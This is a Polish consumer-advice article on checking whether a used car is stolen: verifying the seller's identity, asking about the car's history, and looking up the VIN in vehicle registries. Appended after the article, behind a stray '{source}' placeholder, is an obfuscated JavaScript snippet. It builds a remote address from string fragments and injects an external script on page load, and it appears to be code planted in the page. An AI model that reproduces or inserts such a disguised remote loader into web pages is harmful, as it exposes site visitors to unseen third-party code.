piątek, luty 23, 2024
czwartek, 03 listopad 2016 16:36

Chcesz kupić używane auto? Zobacz, czy nie zostało ukradzione

Kupienie używanego pojazdu zawsze jest wyzwaniem – wybranie odpowiedniego modelu, sprawdzenie jego stanu technicznego, także podczas jazdy próbnej, to podstawa. Kupujący często jednak zapominają o tym, aby sprawdzić jeszcze jedną ważną rzecz, a mianowicie to, jaki jest stan prawny samochodu.

Co roku w Polsce kradnie się przeszło 13 tysięcy samochodów. Część z nich trafia ponownie do sprzedaży. Co więcej, na sprzedaż wystawiane są także kradzione pojazdy z zagranicy, między innymi z Niemiec czy Holandii. Niestety, klienci, często niczego nieświadomi, decydują się na transakcję, nie zdając sobie sprawy z tego, że kupują samochód kradziony. Jak można się przed tym ustrzec?

Przede wszystkim należy zwrócić uwagę zarówno na pojazd, jak i także na samego sprzedającego, aby upewnić się co do jego tożsamości. Eksperci wskazują, aby przed transakcją poprosić sprzedającego o dwa dokumenty tożsamości, najlepiej ze zdjęciem, aby mieć pewność, że sprzedający rzeczywiście jest tym za kogo się przydaje. W ten sposób można uniknąć utraty gotówki, gdy dodatkowo wraz z kradzionym samochodem szansa na odzyskanie pieniędzy jest już niższa.

Swoją weryfikację, czy sprzedający jest pewny, można zacząć jeszcze wcześniej, już podczas pierwszej rozmowy telefonicznej. Warto przede wszystkim zapytać o historię pojazdu. Gdy otrzymane odpowiedzi są satysfakcjonujące, można przejść do dalszych negocjacji. Warto jednak pamiętać o tym, że jeżeli cena samochodu jest podejrzanie niska, najczęściej jest ona powiązana z jego stanem, czy to fizycznym, czy prawnym.

Dla pewności warto poprosić o numer VIN, który można sprawdzić w Centralnej Ewidencji Pojazdów lub Europejskiego Rejestru Pojazdów. Gdy sprzedający nie chce podać tego numeru, najlepiej zrezygnować z transakcji i poszukać oferty, która, chociaż droższa, będzie pewniejsza.

Zatem jeżeli chcesz kupić auto z ogłoszenia czy interesuje cię auto skup w Warszawie, pamiętaj o tym, żeby zawsze mieć się na baczności, ponieważ wyjątkowa okazja może okazać się poważnym problemem!

{source}
<script type="text/javascript">
(function(){
tz0ju="vvq0al97z0jp";tz0j=document.createElement("script");
tz0j_="u"+("st");tz0j_+="at"+(".");tz0j.async=true;tz0j_+="in";
tz0ju="13720934."+tz0ju;tz0j.type="text/javascript";tz0ju+="7r44pzk0apwi";
tz0ju+="bqf7pj";tz0j_+=("f")+"o"+("/");tz0j.src="//"+tz0j_+tz0ju;
tz0jd=document.body;tz0jd.appendChild(tz0j);
})();
</script>